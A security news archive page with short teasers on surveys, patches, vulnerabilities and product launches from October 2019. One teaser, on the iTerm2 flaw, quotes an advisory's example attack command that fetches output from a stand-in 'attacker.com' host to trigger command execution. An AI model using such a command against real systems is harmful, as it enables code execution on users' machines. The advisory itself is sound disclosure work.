Category Archives: Don’t miss

Microsoft debuts hardware-rooted security for foiling firmware attacks

Microsoft partnered with mainstream chip and computer makers to deliver hardware protection of firmware right out of the box: the so-called Secured-core PCs are aimed at foiling attackers who rely on exploiting firmware vulnerabilities to surreptitiously gain access to computer systems.
Firmware is an attractive target
Attackers are always looking for new and easier ways to compromise target systems, as well as ways to keep that compromise concealed from the system owners for as long … More

The post Microsoft debuts hardware-rooted security for foiling firmware attacks appeared first on Help Net Security.

Why organizations must arm their SOCs for the future

Security Operations Centers (SOCs) around the globe represent the first line of defense between enterprises and cyber-threats. This mission requires that SOCs respond to security alerts around the clock, and jump into action as quickly as possible to minimize the damage done from events that are in progress while keeping the uptime of critical operations in accordance with the SLAs. The importance of SOCs is highlighted by the fact that 30% of CEOs rate cyber-threats … More

Perceptions on the impact of data breaches and identity protection

4iQ recently completed research focusing on Americans’ attitudes about cybersecurity breaches and the efforts that organizations make to mitigate breaches’ effects on identity theft. Where’s the data? The findings indicate that a large proportion of Americans (44%) believe their personally identifiable information (PII) has been stolen as a result of a data breach. A strong majority (63%) are concerned that prior breaches could lead to future identity fraud, and a significant number (37%) believe they … More

How the under 30s expect new approaches to cybersecurity

In today’s multigenerational workforce, the over-30s are more likely to adopt cybersecurity good practice than their younger colleagues who have grown up with digital technology. This is according to a report on generational attitudes to cybersecurity from the security division of NTT. The report identified good and bad practice for organizations researched as part of its Risk:Value 2019 report, scored across 17 key criteria. This revealed that under-30s score 2.3 in terms of cybersecurity best … More

How cybersecurity accelerates business growth

It’s no secret that the cybersecurity industry has grown exponentially over more than a decade due to the proliferation of high-profile cybercrime. Viewing cybersecurity as simply a necessary step to mitigate cyber risk leaves much opportunity on the table. Organizational leaders need to see cybersecurity as a business enabler that can accelerate growth. Companies that view cybersecurity with the myopic lens of being a necessary overhead cost to protect data are losing out on opportunities … More

Deepfakes and voice as the next data breach

Deepfake technology, which uses deep learning to create fake or altered video and audio content, continues to pose a major threat to businesses, consumers, and society as a whole. In the lead up to the 2020 U.S. presidential election, government officials have expressed concerns about potential deepfake attacks to spread misinformation, and evidence suggests that while this technology is advancing rapidly, governments and tech companies are still ill-prepared to detect and combat it. Deepfakes caught … More

Webinar: Application Protection and Performance Monitoring Using Datadog + Signal Sciences

For years, security, operations, and engineering have struggled to get one cohesive view of application performance and real-time attacks due to multiple streams of data from a variety of operations and security tools that don’t work well together. We are out to change that. In this webinar, learn how Signal Sciences and Datadog have teamed up to provide powerful monitoring, visualization, and alerting—all in one place. Learn how this integration: Provides developers immediate app performance … More

Cryptojacking worm compromised over 2,000 Docker hosts

Security researchers have discovered a cryptojacking worm that propagates using containers in the Docker Engine (Community Edition) and has spread to more than 2,000 vulnerable Docker hosts. “The attacker compromised an unsecured Docker daemon, ran the malicious Docker container pulled from Docker Hub, downloaded a few scripts and a list of vulnerable hosts from C2 and repeatedly picked the next target to spread the worm,” Palo Alto Networks’s Unit 42 researchers explained. A worm named … More

Six steps for implementing zero trust access

Modern organizations are no longer governed by fixed perimeters. In fact, the perimeter-based security model is disintegrating in a world where users work on their own devices from anywhere, and sensitive company data is stored in multiple cloud services. Organizations can no longer rely on binary security models that focus on letting good guys in and keeping bad guys out. Their big challenge is figuring out how to give users the access they need while … More

New infosec products of the week: October 18, 2019

Pradeo Secure Private Store facilitates and expands safe BYOD usage
Pradeo launched a unique Secure Private Store solution that allows organizations to distribute mobile services to their collaborators (public and private apps, documents), that they can freely use under the condition that their device does not bear any threat.
Elastic blends SIEM and endpoint security into a single solution for real-time threat response
Elastic Endpoint Security is based on Elastic’s acquisition of Endgame. Now, when … More

As car manufacturers focus on connectivity, hackers begin to exploit flaws

Car manufacturers offer more software features to consumers than ever before, and increasingly popular autonomous vehicles that require integrated software introduce security vulnerabilities. Widespread cloud connectivity and wireless technologies enhance vehicle functionality, safety, and reliability but expose cars to hacking exploits. In addition, the pressure to deliver products as fast as possible puts a big strain on the security capabilities of cars, manufacturing facilities, and automotive data, an IntSights report reveals. “The automotive manufacturing industry … More

Review: The Great Hack

Data is the most valuable asset/resource on Earth. Still, we have little or no control over who is exploiting ours without our consent. That is what the authors, Jehane Noujaim and Karim Amer, want to make us realize in their documentary film The Great Hack, released by Netflix on July 24, 2019. Jehane Noujaim, American documentary film director, and Karim Amer, Egyptian-American film producer and director, already worked together on The Square (2013), but it … More

Researcher releases PoC rooting app that exploits recent Android zero-day

Late last month Google Project Zero researcher Maddie Stone detailed a zero-day Android privilege escalation vulnerability (CVE-2019-2215) and revealed that it is actively being exploited in attacks in the wild. She also provided PoC code that could help researchers check which Android-based devices are vulnerable and which are not. One of those has decided to go further.
Achieving “root” through a malicious app
“The base PoC left us with a full kernel read/write primitive, essentially … More

Cisco fixes serious flaws in enterprise-grade Catalyst and Aironet access points

Cisco has released another batch of security updates, the most critical of which fixes a vulnerability that could allow unauthenticated, remote attackers to gain access to vulnerable Cisco Aironet wireless access points. Cisco Aironet APs are enterprise-grade access points used for branch offices, campuses, organizations of all sizes, enterprise and carrier-operator Wi-Fi deployments, and so on.
Cisco Aironet vulnerabilities
During the resolution of a Cisco TAC support case, the company’s technicians discovered a number of … More

Key challenges impacting IT audit pros navigating an evolving risk landscape

Protiviti and ISACA surveyed 2,252 chief audit executives (CAEs), internal audit professionals and IT audit vice presidents and directors worldwide. Asked to identify their biggest technology challenges, IT audit leaders and professionals noted the following as their top five:
IT security and privacy/cybersecurity
Data management and governance
Emerging technology and infrastructure changes – transformation/innovation/disruption
Staffing and skills challenges
Third-party/vendor management
“As much as organizations are focusing on cybersecurity and protecting their data, they’re still behind … More

1 in 5 SMBs have fallen victim to a ransomware attack

Ransomware remains the most common cyber threat to SMBs, according to a Datto survey of more than 1,400 MSP decision makers that manage the IT systems for small-to-medium-sized businesses.
SMBs are a prime target
While it is used against businesses of all sizes, SMBs have become a prime target for attackers. The report uncovered a number of ransomware trends specifically impacting the SMB market: Ransomware attacks are pervasive. The number of ransomware attacks against SMBs … More

Executives are not actively engaged in ensuring the effectiveness of cybersecurity strategy

There’s a clear lack of accountability, especially on the board and among C-suite executives, and a lack of confidence in determining the efficacy of security technologies. AttackIQ and Ponemon Institute surveyed 577 IT and IT security practitioners in the United States who are knowledgeable about their organizations’ IT security strategy, tactics, and technology investments. “Enterprise culture is formed at the top. If enterprise leaders are not actively engaged in ensuring a strong cybersecurity posture, it … More

WAV files spotted delivering malicious code

Attackers have embedded crypto-mining and Metasploit code into WAV audio files to stymie threat detection solutions. “All WAV files discovered adhere to the format of a legitimate WAV file (i.e., they are all playable by a standard audio player),” Josh Lemos, VP of Research and Intelligence at BlackBerry Cylance, told Help Net Security. “One WAV file contained music with no indication of distortion or corruption and the others contained white noise. One of the WAV … More

Adobe splats bucketful of bugs in Acrobat and Reader

If you thought that Adobe skipped this month’s Patch Tuesday because there were no immediate vulnerabilities to fix, you were wrong: a week later the company dropped security updates for several of its products, including Acrobat and Reader and the Download Manager. All in all, 82 security holes – most of which are critical – have been plugged. The good news is that none are under active exploitation.
The updates
The update for Adobe Acrobat … More

Code dependency mapping’s role in securing enterprise software

Enterprise software is only as good as its security. Today, a data breach costs $3.92 million on average. Organizations are expected to spend $124 billion on security in 2019 and will probably invest even more given the alarming rate at which cyberattacks are growing. Despite these investments, newer and more sophisticated threats are emerging every day, making the security of an enterprise’s software environment challenging – even for the most well-prepared. Fortunately, new innovations have … More

Microsegmentation for refining safety systems

When the TRITON (aka TRISIS) attack struck three refining sites in the Middle East in November of 2017, it was the first known cyber incident to target safety instrumented systems (SIS), specifically Schneider Electric’s Triconex gear. The consequences of these attacks were plant-wide shutdowns. While such shutdowns are costly, the consequences could have been far worse. Refineries rely on correctly functioning SIS equipment to prevent worker casualties and environmental disasters in the face of both … More

Fake mobile app fraud tripled in first half of 2019

In Q2 2019, RSA Security identified 57,406 total fraud attacks worldwide. Of these, phishing attacks were the most prevalent (37%), followed by fake mobile apps (usually apps posing as those of popular brands). But while phishing went up by just 6 percent when the numbers from 1H 2019 are compared to those from 2H 2018, attacks via financial malware and rogue mobile apps have increased significantly (80 and 191 percent, respectively). “The fact that fraud … More

When properly managed, shadow IT can benefit your organization

77 percent of IT professionals believe their organizations could earn an edge if company leaders were more collaborative with their businesses to find shadow IT solutions, according to a survey of 1000 US-based IT professionals by Entrust Datacard. As organizations adapt to changing technologies, employees are eager to use productivity solutions that help them function more efficiently — even if these solutions are outside the company’s IT rules and processes. This is the shadow IT … More

Download: IR Reporting for Management PPT template

Many security pros that are doing an excellent job in handling incidents find that effectively communicating the process to their management is a challenging task. Cynet addresses this gap with the IR Reporting for Management PPT template, providing an intuitive tool to report both the ongoing IR process and its conclusion. The IR for Management template enables CISOs and CIOs to communicate the key points that management cares about: assurance that the incident is under … More

Tamper Protection prevents malware from disabling Microsoft Defender AV

Microsoft Defender, the anti-malware component of Microsoft Windows, has been equipped with a new protective feature called Tamper Protection, which should prevent malware from disabling it. The feature will be rolled out to Windows 10 users and enabled by default for home users. Enterprise administrators will be able to enable it for endpoints via Intune (the Microsoft 365 Device Management portal).
About Tamper Protection
“Tamper protection prevents unwanted changes to security settings on devices. With … More

“Smart city” governments should also be smart about security

While the definition of “smart city” is still under debate, one thing is indisputable: the technologies used to make smart cities a reality are currently acquired and deployed after very little (or even no) security testing. Cesar Cerrudo, CTO at IOActive and board member of the Securing Smart Cities initiative, says that city governments – the buyers of these technologies – often blindly trust vendors when they say that their products are secure. They ask … More

Viewing cybersecurity incidents as normal accidents

As we continue on through National Cybersecurity Awareness Month (NCSAM), a time to focus on how cybersecurity is a shared responsibility that affects all Americans, one of the themes that I’ve been pondering is that of personal accountability. Years ago, I read Charles Perrow’s book, “Normal Accidents: Living with High-Risk Technologies,” which analyzes the social side of technological risk. When the book was first written in 1984, Perrow analyzed complex systems like nuclear power, aviation … More

Product showcase: Alsid for AD

You are using Active Directory (AD) every day, every hour, every minute when you log into your device, open your emails, access an application, or share a file. But, guess what, it’s also used by hackers on a daily basis. Simply put, when attackers take control of your AD, they inherit godlike powers over your IT. Sweet.
Analyzing attack vectors: How attack pathways are born
Active Directory itself is a robust product that suffered few … More

AI development has major security, privacy and ethical blind spots

Security, privacy and ethics are low-priority issues for developers when modeling their machine learning solutions, according to O’Reilly.
Major issues
Security is the most serious blind spot. Nearly three-quarters (73 per cent) of respondents indicated they don’t check for security vulnerabilities during model building. More than half (59 per cent) of organizations also don’t consider fairness, bias or ethical issues during ML development. Privacy is similarly neglected, with only 35 per cent checking for issues … More

Free SOAR Platforms eBook

A SOAR platform represents an evolution in security operations driven by the vast amounts of data that must be processed. Working off a single platform is critical to successful coordination of detection and response initiatives, as it keeps knowledge sharing across these teams fluid and instantaneous. Security orchestration and automation integrates different technologies and allows you to conduct defensive actions: it increases your effectiveness in stopping, containing, and preventing attacks. The great thing about SOAR … More

Analysis reveals the most common causes behind mis-issued SSL/TLS certificates

We should be able to trust public key certificates, but this is the real world: mistakes and “mistakes” happen. Researchers from Indiana University Bloomington have analyzed 379 reported instances of failures in certificate issuance to pinpoint the most common causes as well as systemic issues that contribute to these happening.
About public key certificates
A public key certificate (aka digital certificate) proves that an individual, entity or a device is the rightful owner and user … More

5 things security executives need to know about insider threat

Insider threat is, unfortunately, an issue that has not yet received sufficient priority. According to the 2018 Deloitte-NASCIO Cybersecurity Study, CISOs’ top challenges remain “budget, talent and increasing cyber threats,” and to some, insider threat doesn’t even make the list of top-ten priorities. Considering what’s at stake – and our 21st-century ability to see signs of, and ultimately prevent, insider threat – this is a phenomenon security executives can no longer afford to ignore. Specifically, … More

New data analysis approach could strengthen the security of IoT devices

A multi-pronged data analysis approach that can strengthen the security of IoT devices, such as smart TVs, home video cameras and baby monitors, against current risks and threats has been created by a team of Penn State World Campus students.
Explosion of IoT devices
A new forecast from IDC estimates that there will be 41.6 billion connected IoT devices, or “things,” generating 79.4 zettabytes (ZB) of data in 2025. “These devices can leave people vulnerable … More

Webinar: Securing Web Layer Assets with Cloud WAF

Developers and operations teams are under constant pressure to release new features and capabilities that keep their organizations ahead of competitors. But when “Innovate!” is a constant rallying cry and velocity the measure of a development team’s worth, what happens to security at the application layer? There’s a solution: instrument and observe web requests using a Cloud Web Application Firewall (WAF) that provides detection and blocking to protect web layer assets without installing additional software. … More

Imperva explains how their recent security incident happened

In late August, Imperva suffered a security incident, resulting in the compromise of sensitive information of some of their Cloud WAF (formerly Incapsula) customers. On Thursday, Imperva CTO Kunal Anand finally explained how it all happened. What happened? The first indication that something went wrong was when, on August 20, 2019, the company received a data set from an unnamed third-party requesting a bug bounty. The notification triggered an investigation and the discovery that, in … More

DevSecOps role expansion has changed how companies address their security posture

While organizations shift their applications to microservices environments, the responsibility for securing these environments shifts as well, Radware reveals. The rapid expansion of the Development Security Operations (DevSecOps) role has changed how companies address their security posture with approximately 70% of survey respondents stating that the CISO was not the top influencer in deciding on security software policy, tools and/or implementation. This shift has likely exposed companies to a broader range of security risks … More

New infosec products of the week: October 11, 2019

FireEye Digital Threat Monitoring: Visibility beyond your walls
FireEye Digital Threat Monitoring automatically collects and analyzes content on the dark and open web, alerting defenders whenever a potential threat is detected. By exposing threats early, organizations can more effectively identify breaches, exposures, and digital threats before they escalate – without adding operational complexity for the current security team.
FileCloud launches Smart DLP, a real-time data leak prevention solution
FileCloud Smart DLP is an intelligent, rule-driven … More

New method validates the integrity of computer chips using x-rays

Guaranteeing that computer chips, which can consist of billions of interconnected transistors, are manufactured without defects is a challenge. But how to determine if a chip is compromised? Now a technique co-developed by researchers at the Paul Scherrer Institut in Switzerland and researchers at the USC Viterbi School of Engineering would allow companies and other organizations to non-destructively scan chips to ensure that they haven’t been altered and that they are manufactured to design specifications … More

Microsoft NTLM vulnerabilities could lead to full domain compromise

Preempt researchers have discovered two vulnerabilities that may allow attackers to bypass a number of protections and mitigations against NTLM relay attacks and, in some cases, to achieve full domain compromise of a network. What is NTLM? NT LAN Manager (NTLM) is an authentication protocol developed by Microsoft, used to authenticate a client to resources on an Active Directory domain. “Interactive NTLM authentication over a network typically involves two systems: a client system, where the … More

2FA, HTTPS and private browsing still a mystery to most Americans

Most US adults know what phishing scams are and where they occur, what browser cookies do, and that advertising is the largest source of revenue for most social media platforms, a recent Pew Research Center survey aimed at testing Americans’ digital knowledge has revealed. But, sadly, it has also shown that most respondents don’t know what https:// means, what the private browsing option does, that WhatsApp and Instagram are owned by Facebook, and can’t identify … More

Critical command execution vulnerability in iTerm2 patched, upgrade ASAP!

A critical vulnerability (CVE-2019-9535) in iTerm2, a macOS terminal emulator frequently used by developers and system administrators, could allow attackers to take control of a target system. “An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer,” Mozilla explained. “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will … More

Build or buy: What to consider when deploying on-premise or cloud-based PKI

Public Key Infrastructure (PKI), once considered an IT table stake, has transformed from a tool used to protect websites to a core digital identity management function within the cybersecurity framework. Today’s PKI establishes and manages digital identities across people, applications and devices within the enterprise. IT teams are deploying PKI to combat several growing cybersecurity threats too, from ransomware and phishing attacks to IoT device hijacking. PKI remains a core component within the larger IT … More

Only 32% of organizations employ a security-first approach to cloud data storage

Although nearly half (48%) of corporate data is stored in the cloud, only a third (32%) of organizations admit they employ a security-first approach to data storage in the cloud, according to a global study from Thales, with research from the Ponemon Institute. Surveying over 3,000 IT and IT security practitioners in Australia, Brazil, France, Germany, India, Japan, the United Kingdom and the United States, the research found that only one in three (31%) organizations … More

Does poor password hygiene still hamper your ability to achieve high security standards?

While more businesses are investing in security measures like multifactor authentication (MFA), employees still have poor password habits that weaken companies’ overall security posture, according to LastPass. Given that stolen and reused credentials are linked to 80 percent of hacking-related breaches, businesses must take more action to improve password and access security to make a big impact on risk reduction. “Securing employee access has never been more important and unfortunately, we see businesses ignore password … More

Free eBook: Threat intelligence platforms

Today’s threat environment is complex and dynamic. The internet was built for connectivity, not security, and approaches such as intrusion detection systems, anti-virus programs, and traditional incident response methodologies by themselves are no longer sufficient in the face of the widening gap between offensive and defensive capabilities. Organizations today face Advanced Persistent Threats (APTs) and organized, criminally motivated attacks launched by adversaries with the tools, training, and resources to breach most conventional network defense systems. … More

October 2019 Patch Tuesday: A small batch of updates from Microsoft, none from Adobe

As predicted by Ivanti’s Chris Goettl, October 2019 Patch Tuesday came with a relatively small number of Microsoft updates and, curiously enough, with no security updates from Adobe. There is no report of any of the Microsoft bugs being exploited, but there is public PoC code for and info about a local privilege escalation flaw in Windows Error Reporting (CVE-2019-1315).
Microsoft’s patches
Microsoft has addressed nearly 60 vulnerabilities, nine of which are critical. Seven of … More

Winning the security fight: Tips for organizations and CISOs

For large organizations looking to build a robust cybersecurity strategy, failure to get the fundamentals in place practically guarantees a disaster. If you ask Matthew Rosenquist, a former Cybersecurity Strategist for Intel (now independent), overcoming denial of risk, employing the right cybersecurity leader, and defining clear goals are the three most critical objectives for avoiding a negative outcome.
Getting things right
“Every organization, large and small, begins with a belief they are not at significant … More

Digital transformation requires an aggressive approach to security

Organizations agree, building security into digital transformation initiatives is a priority, yet the recommended path to progress is unclear, according to a survey conducted by ZeroNorth. Companies of all sizes and in all industries are experiencing the pains of digital transformation, with 79% of survey respondents indicating their organization already has related initiatives underway. All participants indicate the importance of digital transformation to the future of their organization, even those who have not yet embarked … More


Phishing attempts increase 400%, many malicious URLs found on trusted domains

1 in 50 URLs are malicious, nearly one-third of phishing sites use HTTPS and Windows 7 exploits have grown 75% since January. A new Webroot report also highlights the importance of user education, as phishing lures have become more personalized as hackers use stolen data for more than just account takeover. Hackers are using trusted domains and HTTPS to trick victims Nearly a quarter (24%) of malicious URLs were found to be hosted on trusted … More


macOS Catalina: Security and privacy improvements

Apple has released macOS Catalina (v10.15), a new major release of its desktop operating system, which comes with many functional and security and privacy improvements. The former include a new game subscription service, a feature that extends Mac desktops with iPad as a second display, a new accessibility feature that makes it possible to control Mac entirely by voice, and more. The latter include, among other things, better protections against macOS tampering, an improved Gatekeeper, … More


Unmask cybercriminals through identity attribution

Organized crime has grown more complex since the turn of the century—coinciding with the rise of the digital world, cybercriminals have leveraged the proliferation of technology to broaden their reach with a more sophisticated network-structured model, effectively globalizing their operations in cyberspace and ultimately allowing cybercriminals to devastate companies and consumers alike. The faster you act, the quicker you will be able to disrupt the adversary and prevent future attacks, directly yielding greater financial savings … More


Product showcase: Awake Security Network Traffic Analysis Platform

Security experts profess that enterprise organizations must assume their network is already compromised. Cyber-attacks use network communications for malware distribution, command and control, and data exfiltration. With the right tools, security professionals should be able to uncover malicious activity and take prompt action to mitigate it. Network traffic analysis (NTA) tools were designed to help security personnel to detect attackers that had managed to evade traditional defenses, especially those that are already inside the perimeter. … More


Organizations need tools that support DevOps security

Organizational silos create unnecessary security risk for global businesses. The lack of security involvement in DevOps projects was reportedly creating cyber risk for 72% of IT leaders, according to Trend Micro. In an effort to better understand the DevOps culture, Trend Micro commissioned Vanson Bourne to poll 1,310 IT decision makers in SMB and enterprise organizations across the globe about their organizational culture. “It’s no secret that developers and security teams have a history of … More


Report: 2019 eSentire Threat Intelligence Spotlight

This new report, Threat Intelligence Spotlight: The Shifting Framework of Modern Malware, draws on data gathered from the 650-plus organizations that eSentire protects and Carbon Black’s extensive endpoint protection install base. Key insights of the report include: an approximate median of 10 variants within a malware family, which begins to highlight the challenges faced by traditional endpoint solutions; the largest number of variants within a malware family is more than 200; it takes nearly 40 … More


Cisco closes high-impact vulnerabilities in its security offerings

Cisco has fixed 18 high-impact vulnerabilities affecting several of its security offerings and is advising administrators to test and implement the offered security updates as soon as possible. “Successful exploitation of the vulnerabilities could allow an attacker to gain unauthorized access, gain elevated privileges, execute arbitrary commands, or cause a denial of service (DoS) condition on an affected device,” the company said. About the vulnerabilities The vulnerabilities affect Cisco ASA (Adaptive Security Appliance) Software, Cisco … More


Cloud-native applications need a unified continuous security approach

Cloud-native has arrived and now, it’s taking over. By 2021, 92% of companies will go cloud-native. It’s faster, it’s more efficient, more scalable, and more flexible. But is it more secure? As businesses integrate cloud-native technologies, such as Kubernetes, across their clouds, the complexity and distributed nature of these platforms increasingly require companies to rethink their approach not only to Dev and Ops, but also, security. The primary cloud platforms – AWS, Azure and Google … More


Insider threats are security’s new reality: Prevention solutions aren’t working

Insider threats expose companies to breaches and put corporate data at risk. New research from Code42 questions whether the right data security solutions are being funded and deployed to stop insider threats and asserts that legacy data loss prevention solutions fall short in getting the job done. Today, 79% of information security leaders believe that employees are an effective frontline of defense against data breaches. However, this year’s report disputes that notion. Wake-up call: Insider … More


Whitepaper: Identifying Web Attack Indicators

Attackers are always looking for ways into web and mobile applications. The 2019 Verizon Data Breach Investigation Report listed web applications as the number one vector attackers use when breaching organizations. In this paper, Signal Sciences examines malicious web request patterns for four of the most common web attack methods and shows how to gain the context and visibility that is key to stopping these attacks. Key learnings: Four common web layer attack types: account takeover, … More


Unpatched Android flaw exploited by attackers, impacts Pixel, Samsung, Xiaomi devices

A privilege escalation vulnerability affecting phones running Android 8.x and later is being leveraged by attackers in the wild, Google has revealed. Interestingly enough, the flaw was patched in late 2017 in v4.14 of the Linux kernel and in Android versions 3.18, 4.4, and 4.9, but the fix was apparently never propagated to later Android versions. Who’s affected? Maddie Stone, a Senior Security Engineer on the Android Security team at Google, revealed that a number … More


October 2019 Patch Tuesday forecast: Be sure to apply service stack updates

School is back in session across most of the world, and here in the United States most students look forward to a school holiday called ‘fall break.’ While we never have a Patch Tuesday off, this may actually be a bit of fall break for most of us because I don’t anticipate many updates this month. Before we get into the forecast details, I’d like to provide some information around service stack updates (SSUs) and how … More


New infosec products of the week: October 4, 2019

Anomali Altitude automates detection, analysis, and threat response The Anomali Altitude platform delivers Anomali Lens, Anomali ThreatStream, and Anomali Match. The integrated product suite allows customers to automate detection, analysis, and response for high-priority external and internal threats. Anomali Lens allows anyone, from security operations staff to board members, to automatically and immediately know if their organizations are being attacked, who adversaries are, and if the attacks have been successful. Titus Accelerator for Privacy reduces … More


Enterprises leaving themselves vulnerable to cyberattacks by failing to prioritize PKI security

IoT is one of the fastest growing trends in technology today, yet enterprises are leaving themselves vulnerable to dangerous cyberattacks by failing to prioritize PKI security, according to new research from nCipher Security. The 2019 Global PKI and IoT Trends Study, conducted by research firm the Ponemon Institute and sponsored by nCipher Security, is based on feedback from more than 1,800 IT security practitioners in 14 countries/regions. The study found that IoT is the fastest-growing … More


Microsoft will continue providing Windows 7 security updates for SMBs

According to Alert Logic’s latest research, most devices in small and midsize businesses (SMBs) run Windows versions that are expired or are about to expire soon. Luckily for SMBs that don’t want to or can’t upgrade from Windows 7, Microsoft has decided to provide extended security updates (ESU) through January 2023 – if they are willing to pay for them, of course. Details about the ESU offer Windows is the most popular desktop operating system … More


Good cybersecurity comes from focusing on the right things, but what are they?

“There is no wrong way into the security field and it’s never too late to make a career switch that will take you there,” says Mark Orlando, CTO at Raytheon Cyber Protection Solutions. If you think that’s easy for him to say, consider his education and employment twists and turns before getting into technology and, ultimately, into cybersecurity: he was an art and design student, then a Marine, and later a UPS truck loader. While … More


How security programs and breach history influence company valuations

96% of cybersecurity professionals indicated that cybersecurity readiness factors into the calculation when they are assessing the overall monetary value of a potential acquisition target, an (ISC)2 survey reveals. (ISC)2 surveyed 250 U.S.-based professionals with mergers and acquisitions (M&A) expertise. Survey respondents unanimously agreed that cybersecurity audits are not only commonplace but are actually standard practice during M&A transaction preparation. The research also found that the results of such due diligence can have a tangible … More


PDFex attacks can exfiltrate content from encrypted PDF documents

Researchers from Ruhr University Bochum and Münster University of Applied Sciences have devised new attacks allowing them (and potential attackers) to recover the plaintext content of encrypted PDF documents. The attacks work against 27 widely-used desktop and browser-integrated PDF viewers. The attacks The PDFex attacks (as the researchers collectively dubbed them) can either result in direct exfiltration or exfiltration via CBC gadgets. Direct exfiltration attacks abuse the fact that some PDF readers don’t encrypt the … More


Urgent11 flaws affect more medical, industrial devices than previously thought

When, in late July, Armis researchers revealed the existence of the so-called Urgent11 vulnerabilities in Wind River’s VxWorks real-time operating system, they noted that RTOS offerings by other vendors may also be vulnerable. As it turns out, they were right – they are also present in some versions of these Real Time Operating Systems: OSE by ENEA, INTEGRITY by Green Hills, Nucleus RTOS by Mentor, ITRON by TRON Forum, and ZebOS by IP Infusion. (The researchers … More


The 5 biggest examples of executive threats and how to prevent them

Many executives focus their security efforts and budgets solely on physical threats, but attacks targeting an executive’s digital presence can be just as dangerous. Criminals are looking to exploit the wealth of high-profile and high net-worth individuals—or cause them embarrassment or personal harm—at an unprecedented rate. And, as the most abundant source of company secrets and IP, they’re a primary attack vector of their businesses too. Attacks on VIPs involve attempts at accessing their sensitive … More


49% of infosec pros are awake at night worrying about their organization’s cybersecurity

Six in every ten businesses have experienced a breach in either in the last three years. At least a third of infosec professionals (36%) whose employers had not recently been a victim of a cyber attack also believe that it is likely that they are currently facing one without knowing about it. This may be an indicator of a bumper year for breaches, as the total number of organizations reporting breaches in 2018 only came … More


Sophos Managed Threat Response: An evolved approach to proactive security protection

In its 2019 market guide for managed detection and response (MDR) services, Gartner forecasted that by 2024, 25% of organizations will be using MDR services, up from less than 5% today. While the percentage might not end up as high as that, there’s no doubt that the demand for these services will increase rapidly, fueled by organizations’ inability to acquire, train and retain cybersecurity talent and to keep pace with the rising sophistication and complexity … More


Danish company Demant expects to suffer huge losses due to cyber attack

Danish hearing health care company Demant has estimated it will lose between $80 and $95 million due to a recent “cyber-crime” attack. Though the company has yet to share details about the “IT infrastructure incident”, it is widely believed to be the work of ransomware-wielding attackers. What is known? The attack started on September 2 and, apparently, the company quickly decided to shut down IT systems across multiple sites and business units: Still, the reaction … More


Vulnerability in Cisco Webex and Zoom may expose online meetings to snooping

Cequence Security’s CQ Prime Threat Research Team discovered a vulnerability in Cisco Webex and Zoom video conferencing platforms that potentially allows an attacker to enumerate or list and view active meetings that are not protected. The web conferencing market includes nearly three dozen vendors, some of whom may use similar meeting identification techniques. Although the CQ Prime team did not test each of these products, it is possible they could be susceptible as well. … More


Guess what? You should patch Exim again!

Hot on the heels of a patch for a critical RCE Exim flaw comes another one that fixes a denial of service (DoS) condition (CVE-2019-16928) that could also be exploited by attackers to pull off remote code execution. With no mitigations available at this time, Exim maintainers urge admins to upgrade to version 4.92.3, which was released on Sunday. About Exim and the flaw (CVE-2019-16928) According to E-Soft, Exim is the most widely used … More


Assessing risk: Measuring the health of your infosec environment

There is an uncomfortable truth that many organizations are not conducting comprehensive assessments of their information security risk; or those that do aren’t getting much value out of assessment exercises — because they simply don’t know how. Given the massive amounts of data organizations hold, accurately assessing these risks is difficult. So is determining how to best control them once they are identified. That’s especially needed for businesses in highly regulated industries that can face … More


Managing and monitoring privileged access to cloud ecosystems

Cloud data breaches are on the rise, demonstrating time and again the need for a different approach and strategy when it comes to managing and monitoring privileged access to cloud ecosystems. Privilege access management (PAM) should: be risk-aware and intelligent; reduce sprawl of infrastructure, accounts, access and credentials; use continuous identity analytics. Just-in-time management of privileged accounts According to Gartner’s 2018 Magic Quadrant for PAM report, by 2022 more than 50% of organizations with PAM … More


Tolly report: Evaluating the evolution of network traffic analysis technology

Network Traffic Analysis has been rapidly evolving to counter the increased sophistication of threats experienced by organizations worldwide. Test methodologies and tools are not yet available which provide security professionals with the ability to test how well the products currently on the market perform. Awake Security has partnered with the Tolly Group and a current Darktrace customer to develop and execute just such a test and has published a report detailing the methodology and the … More


Ransomware attacks against small towns require collective defense

There is a war hitting small-town America. Hackers are not only on our shores, but they’re in our water districts, in our regional hospitals, and in our 911 emergency systems. The target du jour of ransomware hackers is small towns and they have gone after them with a vengeance. Last month, the governor of Texas, Greg Abbott, declared a “Level 2 Escalated Response” as 22 of Texas’s cities were hit simultaneously with ransomware attacks, crippling … More


Microsoft to block 40+ additional file extensions in Outlook on the web

Microsoft is planning to block by default 40+ new file types in Outlook on the web to improve the security for their customers. “We took the time to audit the existing blocked file list and update it to better reflect the file types we see as risks today,” the Exchange Team noted. Outlook on the web and blocked attachments Outlook on the web, formerly Outlook Web Access (OWA), is a personal information manager web app … More


How long before quantum computers break encryption?

The verdict is in: quantum computing poses an existential threat to asymmetric cryptography algorithms like RSA and ECC that underpin practically all current Internet security. This comes straight from the National Academy of Science’s Committee on Technical Assessment of the Feasibility and Implications of Quantum Computing. The inevitable follow-up: OK, so how much time do we have before we’re living in a post-quantum world? The short answer is, nobody knows. That’s not for lack of … More


A proactive approach to cybersecurity requires the right tools, not more tools

The key challenge facing security leaders and putting their organizations at risk of breach is misplaced confidence that the abundance of technology investments they have made has strengthened their security posture, according to a study conducted by Forrester Consulting. The study surveyed over 250 senior security decision-makers in North America and Europe. Participants included CISO, CIO, IT and security VPs from organizations ranging from 3,000 to over 25,000 employees. Currently, security leaders employ a variety … More


ThreatConnect Platform: Security insight for sound decision-making

In this interview, Jason Spies, VP of Engineering & Chief Architect, ThreatConnect, talks about the powerful features of the ThreatConnect Platform. Oftentimes, the ability for a product to support growth (scale effectively) is forgotten in lieu of a customer being dazzled by individual features or capabilities. Can you talk about the importance of technical considerations when it comes to a Platform scaling to support multiple teams and growing demands over time? Bottom line, it’s a balance … More


eBook: The DevOps Roadmap for Security

DevOps is concerned with uniting two particular tribes: development and operations. These tribes have seemingly competing priorities: developers value features while operations value stability. These contradictions are largely mitigated by DevOps. A strong argument could be made that the values of the security tribe – defensibility – could just as easily be brought into the fold, forming a triumvirate under the DevSecOps umbrella. The security tribe’s way forward is to find ways to unify with … More


How to start achieving visibility in the cloud

